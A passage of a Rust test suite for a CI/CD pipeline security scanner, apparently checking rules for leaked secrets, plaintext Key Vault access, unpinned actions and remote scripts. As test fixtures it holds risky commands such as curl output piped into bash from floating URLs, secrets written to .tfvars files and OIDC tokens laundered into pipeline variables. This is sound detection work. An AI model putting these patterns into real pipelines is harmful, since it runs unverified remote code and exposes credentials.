8545                      $TFfile = Get-Content $(System.DefaultWorkingDirectory)/in.tfvars\n\
8546                      $TFfile = $TFfile.Replace(\"x\", $AppContainerDBPassword)\n\
8547                      $TFfile | Out-File $(System.DefaultWorkingDirectory)/envVars/tffile.tfvars";
8548        let g = build_step_with_script("AppContainerDBPassword", script);
8549        let findings = secret_materialised_to_workspace_file(&g);
8550        assert_eq!(
8551            findings.len(),
8552            1,
8553            "Out-File of bound secret to workspace must fire"
8554        );
8555        assert_eq!(findings[0].severity, Severity::High);
8556    }
8557
8558    #[test]
8559    fn bash_redirect_of_secret_to_tfvars_flagged() {
8560        let script =
8561            "echo \"token = \\\"$(TF_TOKEN)\\\"\" > $(Build.SourcesDirectory)/secrets.tfvars";
8562        let g = build_step_with_script("TF_TOKEN", script);
8563        let findings = secret_materialised_to_workspace_file(&g);
8564        assert_eq!(findings.len(), 1);
8565    }
8566
8567    #[test]
8568    fn echoing_secret_to_stdout_not_flagged_by_materialisation_rule() {
8569        let g = build_step_with_script("TF_TOKEN", "echo using $(TF_TOKEN)\nterraform init");
8570        let findings = secret_materialised_to_workspace_file(&g);
8571        assert!(
8572            findings.is_empty(),
8573            "stdout echo (no file sink) must not trip materialisation rule"
8574        );
8575    }
8576
8577    #[test]
8578    fn write_to_unrelated_path_not_flagged() {
8579        // No workspace-path keyword, no risky extension — should not fire.
8580        let script = "echo $(MY_SECRET) > /var/tmp/ignore.log";
8581        let g = build_step_with_script("MY_SECRET", script);
8582        let findings = secret_materialised_to_workspace_file(&g);
8583        assert!(findings.is_empty());
8584    }
8585
8586    // ── keyvault_secret_to_plaintext ─────────────────────────
8587
8588    #[test]
8589    fn keyvault_asplaintext_flagged() {
8590        let script = "$pass = Get-AzKeyVaultSecret -VaultName foo -Name bar -AsPlainText\n\
8591                      Write-Host done";
8592        let g = build_step_with_script("UNUSED", script);
8593        let findings = keyvault_secret_to_plaintext(&g);
8594        assert_eq!(findings.len(), 1);
8595        assert_eq!(findings[0].severity, Severity::Medium);
8596    }
8597
8598    #[test]
8599    fn keyvault_secretvaluetext_legacy_pattern_flagged() {
8600        let script = "$pwd = (Get-AzKeyVaultSecret -VaultName foo -Name bar).SecretValueText";
8601        let g = build_step_with_script("UNUSED", script);
8602        let findings = keyvault_secret_to_plaintext(&g);
8603        assert_eq!(findings.len(), 1);
8604    }
8605
8606    #[test]
8607    fn convertfrom_securestring_asplaintext_flagged() {
8608        let script = "$plain = ConvertFrom-SecureString $sec -AsPlainText";
8609        let g = build_step_with_script("UNUSED", script);
8610        let findings = keyvault_secret_to_plaintext(&g);
8611        assert_eq!(findings.len(), 1);
8612    }
8613
8614    #[test]
8615    fn keyvault_securestring_handling_not_flagged() {
8616        // Using the secret as SecureString (no -AsPlainText) is the safe pattern.
8617        let script = "$sec = Get-AzKeyVaultSecret -VaultName foo -Name bar\n\
8618                      $cred = New-Object PSCredential 'svc', $sec.SecretValue";
8619        let g = build_step_with_script("UNUSED", script);
8620        let findings = keyvault_secret_to_plaintext(&g);
8621        assert!(
8622            findings.is_empty(),
8623            "SecureString-only handling is the recommended pattern and must not fire"
8624        );
8625    }
8626
8627    // ── terraform_auto_approve_in_prod ──────────────────────
8628
8629    fn step_with_meta(g: &mut AuthorityGraph, name: &str, meta: &[(&str, &str)]) -> NodeId {
8630        let mut m = std::collections::HashMap::new();
8631        for (k, v) in meta {
8632            m.insert((*k).to_string(), (*v).to_string());
8633        }
8634        g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, m)
8635    }
8636
8637    #[test]
8638    fn terraform_auto_approve_against_prod_connection_fires() {
8639        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8640        step_with_meta(
8641            &mut g,
8642            "Terraform : Apply",
8643            &[
8644                (META_TERRAFORM_AUTO_APPROVE, "true"),
8645                (META_SERVICE_CONNECTION_NAME, "sharedservice-w365-prod-sc"),
8646            ],
8647        );
8648
8649        let findings = terraform_auto_approve_in_prod(&g);
8650        assert_eq!(findings.len(), 1);
8651        assert_eq!(findings[0].severity, Severity::Critical);
8652        assert_eq!(
8653            findings[0].category,
8654            FindingCategory::TerraformAutoApproveInProd
8655        );
8656        assert!(
8657            findings[0].message.contains("sharedservice-w365-prod-sc"),
8658            "message should name the connection, got: {}",
8659            findings[0].message
8660        );
8661    }
8662
8663    #[test]
8664    fn terraform_auto_approve_via_edge_to_service_connection_identity() {
8665        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8666        let step = step_with_meta(
8667            &mut g,
8668            "Terraform : Apply",
8669            &[(META_TERRAFORM_AUTO_APPROVE, "true")],
8670        );
8671        let mut id_meta = std::collections::HashMap::new();
8672        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
8673        let conn = g.add_node_with_metadata(
8674            NodeKind::Identity,
8675            "alz-infra-sc-prd-uks",
8676            TrustZone::FirstParty,
8677            id_meta,
8678        );
8679        g.add_edge(step, conn, EdgeKind::HasAccessTo);
8680
8681        let findings = terraform_auto_approve_in_prod(&g);
8682        assert_eq!(findings.len(), 1);
8683        assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
8684    }
8685
8686    #[test]
8687    fn terraform_auto_approve_with_env_gate_downgrades_to_medium() {
8688        // Per blue-team CC-4: env gate is a partial control (the gate's
8689        // approver list is invisible from YAML), so the finding stays
8690        // visible at Medium rather than disappearing entirely.
8691        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8692        step_with_meta(
8693            &mut g,
8694            "Terraform : Apply",
8695            &[
8696                (META_TERRAFORM_AUTO_APPROVE, "true"),
8697                (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
8698                (META_ENV_APPROVAL, "true"),
8699            ],
8700        );
8701
8702        let findings = terraform_auto_approve_in_prod(&g);
8703        assert_eq!(
8704            findings.len(),
8705            1,
8706            "env-gated apply must still emit a finding"
8707        );
8708        assert_eq!(
8709            findings[0].severity,
8710            Severity::Medium,
8711            "env-gated apply downgrades Critical → Medium (compensating control credit)"
8712        );
8713        assert!(findings[0]
8714            .message
8715            .contains("`environment:` binding present"));
8716    }
8717
8718    #[test]
8719    fn terraform_auto_approve_against_non_prod_does_not_fire() {
8720        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8721        step_with_meta(
8722            &mut g,
8723            "Terraform : Apply",
8724            &[
8725                (META_TERRAFORM_AUTO_APPROVE, "true"),
8726                (META_SERVICE_CONNECTION_NAME, "platform-dev-sc"),
8727            ],
8728        );
8729
8730        let findings = terraform_auto_approve_in_prod(&g);
8731        assert!(findings.is_empty(), "dev connection must not match prod");
8732    }
8733
8734    #[test]
8735    fn terraform_apply_without_auto_approve_does_not_fire() {
8736        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8737        step_with_meta(
8738            &mut g,
8739            "Terraform : Apply",
8740            &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
8741        );
8742
8743        let findings = terraform_auto_approve_in_prod(&g);
8744        assert!(findings.is_empty());
8745    }
8746
8747    #[test]
8748    fn looks_like_prod_connection_matches_real_world_names() {
8749        assert!(looks_like_prod_connection("sharedservice-w365-prod-sc"));
8750        assert!(looks_like_prod_connection("alz-infra-sc-prd"));
8751        assert!(looks_like_prod_connection("prod-tenant-arm"));
8752        assert!(looks_like_prod_connection("PROD"));
8753        assert!(looks_like_prod_connection("my_prod_arm"));
8754        // Negatives — substrings inside other words must not match
8755        assert!(!looks_like_prod_connection("approver-sc"));
8756        assert!(!looks_like_prod_connection("reproducer-sc"));
8757        assert!(!looks_like_prod_connection("dev-sc"));
8758        assert!(!looks_like_prod_connection("staging"));
8759    }
8760
8761    // ── addspn_with_inline_script ───────────────────────────
8762
8763    #[test]
8764    fn addspn_with_inline_script_fires_with_basic_body() {
8765        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8766        step_with_meta(
8767            &mut g,
8768            "ado : azure : login (federated)",
8769            &[
8770                (META_ADD_SPN_TO_ENV, "true"),
8771                (META_SCRIPT_BODY, "az account show --query id -o tsv"),
8772            ],
8773        );
8774
8775        let findings = addspn_with_inline_script(&g);
8776        assert_eq!(findings.len(), 1);
8777        assert_eq!(findings[0].severity, Severity::High);
8778        assert!(!findings[0]
8779            .message
8780            .contains("explicit token laundering detected"));
8781    }
8782
8783    #[test]
8784    fn addspn_with_inline_script_escalates_message_on_token_laundering() {
8785        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8786        step_with_meta(
8787            &mut g,
8788            "ado : azure : login (federated)",
8789            &[
8790                (META_ADD_SPN_TO_ENV, "true"),
8791                (
8792                    META_SCRIPT_BODY,
8793                    "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\"",
8794                ),
8795            ],
8796        );
8797
8798        let findings = addspn_with_inline_script(&g);
8799        assert_eq!(findings.len(), 1);
8800        assert!(
8801            findings[0]
8802                .message
8803                .contains("explicit token laundering detected"),
8804            "message should escalate, got: {}",
8805            findings[0].message
8806        );
8807    }
8808
8809    #[test]
8810    fn addspn_without_inline_script_does_not_fire() {
8811        // No META_SCRIPT_BODY → scriptPath form, not inline
8812        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8813        step_with_meta(
8814            &mut g,
8815            "AzureCLI scriptPath",
8816            &[(META_ADD_SPN_TO_ENV, "true")],
8817        );
8818
8819        let findings = addspn_with_inline_script(&g);
8820        assert!(findings.is_empty());
8821    }
8822
8823    #[test]
8824    fn inline_script_without_addspn_does_not_fire() {
8825        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8826        step_with_meta(
8827            &mut g,
8828            "az account show",
8829            &[(META_SCRIPT_BODY, "az account show")],
8830        );
8831
8832        let findings = addspn_with_inline_script(&g);
8833        assert!(findings.is_empty());
8834    }
8835
8836    #[test]
8837    fn script_launders_spn_token_recognises_known_markers() {
8838        assert!(script_launders_spn_token(
8839            "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\""
8840        ));
8841        assert!(script_launders_spn_token(
8842            "echo \"##vso[task.setvariable variable=X]$env:servicePrincipalKey\""
8843        ));
8844        // setvariable without token material → not laundering, just env mutation
8845        assert!(!script_launders_spn_token(
8846            "echo \"##vso[task.setvariable variable=X]hello\""
8847        ));
8848        // No setvariable at all
8849        assert!(!script_launders_spn_token("$env:idToken"));
8850    }
8851
8852    // ── parameter_interpolation_into_shell ──────────────────
8853
8854    fn graph_with_param(spec: ParamSpec, name: &str) -> AuthorityGraph {
8855        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8856        g.parameters.insert(name.to_string(), spec);
8857        g
8858    }
8859
8860    #[test]
8861    fn parameter_interpolation_fires_on_free_form_string_in_inline_script() {
8862        let mut g = graph_with_param(
8863            ParamSpec {
8864                param_type: "string".into(),
8865                has_values_allowlist: false,
8866            },
8867            "appName",
8868        );
8869        step_with_meta(
8870            &mut g,
8871            "terraform workspace",
8872            &[(
8873                META_SCRIPT_BODY,
8874                "terraform workspace select -or-create ${{ parameters.appName }}",
8875            )],
8876        );
8877
8878        let findings = parameter_interpolation_into_shell(&g);
8879        assert_eq!(findings.len(), 1);
8880        assert_eq!(findings[0].severity, Severity::Medium);
8881        assert!(findings[0].message.contains("appName"));
8882    }
8883
8884    #[test]
8885    fn parameter_interpolation_with_values_allowlist_does_not_fire() {
8886        let mut g = graph_with_param(
8887            ParamSpec {
8888                param_type: "string".into(),
8889                has_values_allowlist: true,
8890            },
8891            "location",
8892        );
8893        step_with_meta(
8894            &mut g,
8895            "Terraform Plan",
8896            &[(
8897                META_SCRIPT_BODY,
8898                "terraform plan -var=\"location=${{ parameters.location }}\"",
8899            )],
8900        );
8901
8902        let findings = parameter_interpolation_into_shell(&g);
8903        assert!(
8904            findings.is_empty(),
8905            "values: allowlist must suppress the finding"
8906        );
8907    }
8908
8909    #[test]
8910    fn parameter_interpolation_default_type_is_treated_as_string() {
8911        let mut g = graph_with_param(
8912            ParamSpec {
8913                // ADO defaults missing `type:` to string — same risk
8914                param_type: "".into(),
8915                has_values_allowlist: false,
8916            },
8917            "appName",
8918        );
8919        step_with_meta(
8920            &mut g,
8921            "Terraform : Plan",
8922            &[(
8923                META_SCRIPT_BODY,
8924                "terraform plan -var \"appName=${{ parameters.appName }}\"",
8925            )],
8926        );
8927
8928        let findings = parameter_interpolation_into_shell(&g);
8929        assert_eq!(findings.len(), 1, "missing type: must default to string");
8930    }
8931
8932    #[test]
8933    fn parameter_interpolation_skips_non_string_params() {
8934        let mut g = graph_with_param(
8935            ParamSpec {
8936                param_type: "boolean".into(),
8937                has_values_allowlist: false,
8938            },
8939            "enabled",
8940        );
8941        step_with_meta(
8942            &mut g,
8943            "step",
8944            &[(META_SCRIPT_BODY, "echo ${{ parameters.enabled }}")],
8945        );
8946
8947        let findings = parameter_interpolation_into_shell(&g);
8948        assert!(findings.is_empty(), "boolean params can't carry shell");
8949    }
8950
8951    #[test]
8952    fn parameter_interpolation_no_spaces_form_also_matches() {
8953        let mut g = graph_with_param(
8954            ParamSpec {
8955                param_type: "string".into(),
8956                has_values_allowlist: false,
8957            },
8958            "x",
8959        );
8960        step_with_meta(
8961            &mut g,
8962            "step",
8963            &[(META_SCRIPT_BODY, "echo ${{parameters.x}}")],
8964        );
8965
8966        let findings = parameter_interpolation_into_shell(&g);
8967        assert_eq!(findings.len(), 1);
8968    }
8969
8970    #[test]
8971    fn parameter_interpolation_skips_step_without_script_body() {
8972        let mut g = graph_with_param(
8973            ParamSpec {
8974                param_type: "string".into(),
8975                has_values_allowlist: false,
8976            },
8977            "appName",
8978        );
8979        // Step has no META_SCRIPT_BODY (e.g. a typed task without an inline script)
8980        g.add_node(NodeKind::Step, "task-step", TrustZone::Untrusted);
8981
8982        let findings = parameter_interpolation_into_shell(&g);
8983        assert!(findings.is_empty());
8984    }
8985
8986    // ── runtime_script_fetched_from_floating_url ───────────────
8987
8988    fn step_with_body(body: &str) -> AuthorityGraph {
8989        let mut g = AuthorityGraph::new(source("ci.yml"));
8990        let id = g.add_node(NodeKind::Step, "install", TrustZone::FirstParty);
8991        if let Some(node) = g.nodes.get_mut(id) {
8992            node.metadata
8993                .insert(META_SCRIPT_BODY.into(), body.to_string());
8994        }
8995        g
8996    }
8997
8998    #[test]
8999    fn floating_curl_pipe_bash_master_is_flagged() {
9000        let g = step_with_body(
9001            "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh | bash",
9002        );
9003        let findings = runtime_script_fetched_from_floating_url(&g);
9004        assert_eq!(findings.len(), 1);
9005        assert_eq!(findings[0].severity, Severity::High);
9006        assert_eq!(
9007            findings[0].category,
9008            FindingCategory::RuntimeScriptFetchedFromFloatingUrl
9009        );
9010    }
9011
9012    #[test]
9013    fn floating_deno_run_main_is_flagged() {
9014        let g = step_with_body(
9015            "deno run https://raw.githubusercontent.com/denoland/deno/refs/heads/main/tools/verify_pr_title.js \"$PR_TITLE\"",
9016        );
9017        let findings = runtime_script_fetched_from_floating_url(&g);
9018        assert_eq!(findings.len(), 1);
9019    }
9020
9021    #[test]
9022    fn pinned_curl_url_with_tag_not_flagged() {
9023        let g = step_with_body(
9024            "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/v0.33.10/scripts/install.sh | bash",
9025        );
9026        let findings = runtime_script_fetched_from_floating_url(&g);
9027        assert!(findings.is_empty(), "tag-pinned URL must not fire");
9028    }
9029
9030    #[test]
9031    fn curl_without_pipe_to_shell_not_flagged() {
9032        // `curl -O` writes to disk; the script isn't executed inline.
9033        let g = step_with_body(
9034            "curl -sSLO https://raw.githubusercontent.com/rust-lang/rust/master/src/tools/linkchecker/linkcheck.sh",
9035        );
9036        let findings = runtime_script_fetched_from_floating_url(&g);
9037        assert!(findings.is_empty(), "download-only must not fire");
9038    }
9039
9040    #[test]
9041    fn bash_process_substitution_curl_main_is_flagged() {
9042        let g = step_with_body(
9043            "bash <(curl -s https://raw.githubusercontent.com/some/repo/main/install.sh)",
9044        );
9045        let findings = runtime_script_fetched_from_floating_url(&g);
9046        assert_eq!(findings.len(), 1);
9047    }
9048
9049    // ── pr_trigger_with_floating_action_ref ────────────────────
9050
9051    fn graph_with_trigger_and_action(trigger: &str, action: &str) -> AuthorityGraph {
9052        let mut g = AuthorityGraph::new(source("pr.yml"));
9053        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9054        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
9055        g
9056    }
9057
9058    #[test]
9059    fn pull_request_target_with_floating_main_action_flagged_critical() {
9060        let g = graph_with_trigger_and_action("pull_request_target", "actions/checkout@main");
9061        let findings = pr_trigger_with_floating_action_ref(&g);
9062        assert_eq!(findings.len(), 1);
9063        assert_eq!(findings[0].severity, Severity::Critical);
9064        assert_eq!(
9065            findings[0].category,
9066            FindingCategory::PrTriggerWithFloatingActionRef
9067        );
9068    }
9069
9070    #[test]
9071    fn pull_request_target_with_sha_pinned_action_not_flagged() {
9072        let g = graph_with_trigger_and_action(
9073            "pull_request_target",
9074            "denoland/setup-deno@667a34cdef165d8d2b2e98dde39547c9daac7282",
9075        );
9076        let findings = pr_trigger_with_floating_action_ref(&g);
9077        assert!(findings.is_empty());
9078    }
9079
9080    #[test]
9081    fn issue_comment_with_floating_action_flagged() {
9082        let g = graph_with_trigger_and_action("issue_comment", "foo/bar@v1");
9083        let findings = pr_trigger_with_floating_action_ref(&g);
9084        assert_eq!(findings.len(), 1);
9085    }
9086
9087    #[test]
9088    fn pull_request_only_does_not_trigger_critical_compound_rule() {
9089        // `pull_request` (without `_target`) is the safe trigger — no base
9090        // repo write. Rule 4 must not fire on it.
9091        let g = graph_with_trigger_and_action("pull_request", "foo/bar@main");
9092        let findings = pr_trigger_with_floating_action_ref(&g);
9093        assert!(
9094            findings.is_empty(),
9095            "pull_request alone must not produce a critical compound finding"
9096        );
9097    }
9098
9099    #[test]
9100    fn comma_separated_trigger_with_pull_request_target_flagged() {
9101        let g = graph_with_trigger_and_action(
9102            "pull_request_target,push,workflow_dispatch",
9103            "foo/bar@main",
9104        );
9105        let findings = pr_trigger_with_floating_action_ref(&g);
9106        assert_eq!(findings.len(), 1);
9107    }
9108
9109    // ── untrusted_api_response_to_env_sink ─────────────────────
9110
9111    fn graph_with_trigger_and_step_body(trigger: &str, body: &str) -> AuthorityGraph {
9112        let mut g = AuthorityGraph::new(source("consumer.yml"));
9113        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9114        let id = g.add_node(NodeKind::Step, "capture", TrustZone::FirstParty);
9115        if let Some(node) = g.nodes.get_mut(id) {
9116            node.metadata
9117                .insert(META_SCRIPT_BODY.into(), body.to_string());
9118        }
9119        g
9120    }
9121
9122    #[test]
9123    fn workflow_run_gh_pr_view_to_github_env_flagged() {
9124        let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json 'number' --jq '\"PR_NUMBER=\\(.number)\"' >> $GITHUB_ENV";
9125        let g = graph_with_trigger_and_step_body("workflow_run", body);
9126        let findings = untrusted_api_response_to_env_sink(&g);
9127        assert_eq!(findings.len(), 1);
9128        assert_eq!(findings[0].severity, Severity::High);
9129    }
9130
9131    #[test]
9132    fn workflow_run_without_env_sink_not_flagged() {
9133        let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json number";
9134        let g = graph_with_trigger_and_step_body("workflow_run", body);
9135        let findings = untrusted_api_response_to_env_sink(&g);
9136        assert!(findings.is_empty());
9137    }
9138
9139    #[test]
9140    fn push_trigger_writing_to_env_not_flagged() {
9141        // Trigger is not in scope (push isn't a cross-workflow trust boundary)
9142        let body = "gh pr view --json number --jq .number >> $GITHUB_ENV";
9143        let g = graph_with_trigger_and_step_body("push", body);
9144        let findings = untrusted_api_response_to_env_sink(&g);
9145        assert!(findings.is_empty());
9146    }
9147
9148    #[test]
9149    fn workflow_run_multiline_capture_then_write_flagged() {
9150        let body = "VAL=$(gh api repos/foo/bar/pulls/$PR --jq .head.ref)\necho \"BRANCH=$VAL\" >> $GITHUB_ENV";
9151        let g = graph_with_trigger_and_step_body("workflow_run", body);
9152        let findings = untrusted_api_response_to_env_sink(&g);
9153        assert_eq!(findings.len(), 1);
9154    }
9155
9156    // ── pr_build_pushes_image_with_floating_credentials ────────
9157
9158    fn graph_pr_with_login_action(trigger: &str, action: &str) -> AuthorityGraph {
9159        let mut g = AuthorityGraph::new(source("pr-build.yml"));
9160        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9161        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
9162        g
9163    }
9164
9165    #[test]
9166    fn pr_with_floating_login_to_gar_flagged() {
9167        let g = graph_pr_with_login_action(
9168            "pull_request",
9169            "grafana/shared-workflows/actions/login-to-gar@main",
9170        );
9171        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9172        assert_eq!(findings.len(), 1);
9173        assert_eq!(findings[0].severity, Severity::High);
9174        assert_eq!(
9175            findings[0].category,
9176            FindingCategory::PrBuildPushesImageWithFloatingCredentials
9177        );
9178    }
9179
9180    #[test]
9181    fn pr_with_floating_docker_login_action_flagged() {
9182        let g = graph_pr_with_login_action("pull_request", "docker/login-action@v3");
9183        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9184        assert_eq!(findings.len(), 1);
9185    }
9186
9187    #[test]
9188    fn pr_with_sha_pinned_docker_login_not_flagged() {
9189        let g = graph_pr_with_login_action(
9190            "pull_request",
9191            "docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d",
9192        );
9193        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9194        assert!(findings.is_empty());
9195    }
9196
9197    #[test]
9198    fn push_trigger_with_floating_login_action_not_flagged() {
9199        // Outside PR context — different rule (unpinned_action) covers it.
9200        let g = graph_pr_with_login_action("push", "docker/login-action@v3");
9201        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9202        assert!(findings.is_empty());
9203    }
9204
9205    #[test]
9206    fn pr_with_unrelated_unpinned_action_not_flagged() {
9207        // Rule scopes itself to registry-login actions only; generic actions
9208        // are covered by `unpinned_action` and `pr_trigger_with_floating_action_ref`.
9209        let g = graph_pr_with_login_action("pull_request", "actions/checkout@v4");
9210        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9211        assert!(findings.is_empty());
9212    }
9213
9214    // ── unpinned_action severity tiering ─────────────────────────
9215
9216    #[test]
9217    fn unpinned_action_well_known_first_party_is_medium() {
9218        // `actions/checkout@v4` — owner is the GitHub-maintained `actions`
9219        // org. The supply-chain surface is real but operationally narrow,
9220        // so the rule emits Medium rather than the default High.
9221        let mut g = AuthorityGraph::new(source("ci.yml"));
9222        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
9223
9224        let findings = unpinned_action(&g);
9225        assert_eq!(findings.len(), 1);
9226        assert_eq!(findings[0].severity, Severity::Medium);
9227        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9228    }
9229
9230    #[test]
9231    fn unpinned_action_same_repo_composite_is_info() {
9232        // `./.github/actions/setup` — same-repo composite action. No
9233        // external supply-chain surface, so the rule emits Info as a
9234        // hygiene-only signal rather than a security finding.
9235        let mut g = AuthorityGraph::new(source("ci.yml"));
9236        g.add_node(
9237            NodeKind::Image,
9238            "./.github/actions/setup",
9239            TrustZone::FirstParty,
9240        );
9241
9242        let findings = unpinned_action(&g);
9243        assert_eq!(findings.len(), 1);
9244        assert_eq!(findings[0].severity, Severity::Info);
9245        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9246    }
9247
9248    #[test]
9249    fn unpinned_action_unknown_owner_is_high() {
9250        // `random-org/foo@v1` — unknown owner, full unbounded supply-chain
9251        // surface. This is the case the rule was originally designed for
9252        // and the only severity tier that still emits at High.
9253        let mut g = AuthorityGraph::new(source("ci.yml"));
9254        g.add_node(NodeKind::Image, "random-org/foo@v1", TrustZone::Untrusted);
9255
9256        let findings = unpinned_action(&g);
9257        assert_eq!(findings.len(), 1);
9258        assert_eq!(findings[0].severity, Severity::High);
9259        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9260    }
9261
9262    #[test]
9263    fn unpinned_action_self_hosted_runner_label_not_flagged() {
9264        // Self-hosted runner labels are FirstParty Image nodes too — but
9265        // they aren't action references and have no @version to pin. The
9266        // rule must skip them (META_SELF_HOSTED is the marker).
9267        let mut g = AuthorityGraph::new(source("ci.yml"));
9268        let mut meta = std::collections::HashMap::new();
9269        meta.insert(META_SELF_HOSTED.into(), "true".into());
9270        g.add_node_with_metadata(NodeKind::Image, "self-hosted", TrustZone::FirstParty, meta);
9271
9272        let findings = unpinned_action(&g);
9273        assert!(
9274            findings.is_empty(),
9275            "self-hosted runner labels must not be flagged as unpinned actions: {findings:#?}"
9276        );
9277    }
9278
9279    // ── authority_propagation clustering ─────────────────────────
9280
9281    #[test]
9282    fn authority_propagation_clusters_one_secret_to_three_sinks() {
9283        // One secret, three different untrusted sinks reached via separate
9284        // propagation paths. After clustering, the rule must emit ONE
9285        // finding listing all three sinks in `nodes_involved`.
9286        let mut g = AuthorityGraph::new(source("ci.yml"));
9287        let secret = g.add_node(NodeKind::Secret, "GITHUB_TOKEN", TrustZone::FirstParty);
9288        let trampoline = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
9289        let sink_a = g.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
9290        let sink_b = g.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);
9291        let sink_c = g.add_node(NodeKind::Step, "deploy[2]", TrustZone::Untrusted);
9292        g.add_edge(trampoline, secret, EdgeKind::HasAccessTo);
9293        g.add_edge(trampoline, sink_a, EdgeKind::DelegatesTo);
9294        g.add_edge(trampoline, sink_b, EdgeKind::DelegatesTo);
9295        g.add_edge(trampoline, sink_c, EdgeKind::DelegatesTo);
9296
9297        let findings = authority_propagation(&g, 4);
9298        assert_eq!(
9299            findings.len(),
9300            1,
9301            "three propagation paths from one secret must collapse to one finding, got: {findings:#?}"
9302        );
9303        let f = &findings[0];
9304        assert_eq!(f.category, FindingCategory::AuthorityPropagation);
9305        assert_eq!(f.severity, Severity::Critical);
9306        // [source, sink_a, sink_b, sink_c] — order preserved by insertion.
9307        assert_eq!(f.nodes_involved.len(), 4);
9308        assert_eq!(f.nodes_involved[0], secret);
9309        assert!(f.nodes_involved.contains(&sink_a));
9310        assert!(f.nodes_involved.contains(&sink_b));
9311        assert!(f.nodes_involved.contains(&sink_c));
9312        assert!(
9313            f.message.contains("3 sinks")
9314                || f.message.contains("deploy[0]") && f.message.contains("deploy[2]"),
9315            "cluster message must mention the multiple sinks: {}",
9316            f.message
9317        );
9318    }
9319
9320    #[test]
9321    fn authority_propagation_does_not_cluster_separate_secrets() {
9322        // Three independent secrets, each reaching one sink. The clustering
9323        // is keyed on the source node, so each secret's path becomes its own
9324        // finding — three findings total, not one.
9325        let mut g = AuthorityGraph::new(source("ci.yml"));
9326        let s1 = g.add_node(NodeKind::Secret, "TOKEN_A", TrustZone::FirstParty);
9327        let s2 = g.add_node(NodeKind::Secret, "TOKEN_B", TrustZone::FirstParty);
9328        let s3 = g.add_node(NodeKind::Secret, "TOKEN_C", TrustZone::FirstParty);
9329        let step1 = g.add_node(NodeKind::Step, "step_a", TrustZone::FirstParty);
9330        let step2 = g.add_node(NodeKind::Step, "step_b", TrustZone::FirstParty);
9331        let step3 = g.add_node(NodeKind::Step, "step_c", TrustZone::FirstParty);
9332        let sink1 = g.add_node(NodeKind::Step, "sink_a", TrustZone::Untrusted);
9333        let sink2 = g.add_node(NodeKind::Step, "sink_b", TrustZone::Untrusted);
9334        let sink3 = g.add_node(NodeKind::Step, "sink_c", TrustZone::Untrusted);
9335        g.add_edge(step1, s1, EdgeKind::HasAccessTo);
9336        g.add_edge(step1, sink1, EdgeKind::DelegatesTo);
9337        g.add_edge(step2, s2, EdgeKind::HasAccessTo);
9338        g.add_edge(step2, sink2, EdgeKind::DelegatesTo);
9339        g.add_edge(step3, s3, EdgeKind::HasAccessTo);
9340        g.add_edge(step3, sink3, EdgeKind::DelegatesTo);
9341
9342        let findings = authority_propagation(&g, 4);
9343        assert_eq!(
9344            findings.len(),
9345            3,
9346            "one finding per distinct source secret, got: {findings:#?}"
9347        );
9348        let sources: std::collections::HashSet<_> =
9349            findings.iter().map(|f| f.nodes_involved[0]).collect();
9350        assert!(sources.contains(&s1));
9351        assert!(sources.contains(&s2));
9352        assert!(sources.contains(&s3));
9353    }
9354
9355    // ── secret_via_env_gate_to_untrusted_consumer ──────────────────────
9356
9357    /// Build a graph with one job containing a configurable sequence of
9358    /// steps. Each tuple is (name, trust_zone, writes_env_gate, reads_env,
9359    /// secret_to_link). Returns the graph plus the assigned NodeIds in
9360    /// declaration order so tests can assert on specific nodes.
9361    fn job_with_steps(
9362        job: &str,
9363        steps: &[(&str, TrustZone, bool, bool, Option<&str>)],
9364    ) -> (AuthorityGraph, Vec<NodeId>) {
9365        let mut g = AuthorityGraph::new(source("ci.yml"));
9366        let mut secret_ids: std::collections::HashMap<String, NodeId> =
9367            std::collections::HashMap::new();
9368        let mut step_ids = Vec::new();
9369        for (name, zone, writes, reads, secret) in steps {
9370            let mut meta = std::collections::HashMap::new();
9371            meta.insert(META_JOB_NAME.into(), job.into());
9372            if *writes {
9373                meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
9374            }
9375            if *reads {
9376                meta.insert(META_READS_ENV.into(), "true".into());
9377            }
9378            let id = g.add_node_with_metadata(NodeKind::Step, *name, *zone, meta);
9379            if let Some(sname) = secret {
9380                let secret_id = *secret_ids
9381                    .entry((*sname).to_string())
9382                    .or_insert_with(|| g.add_node(NodeKind::Secret, *sname, TrustZone::FirstParty));
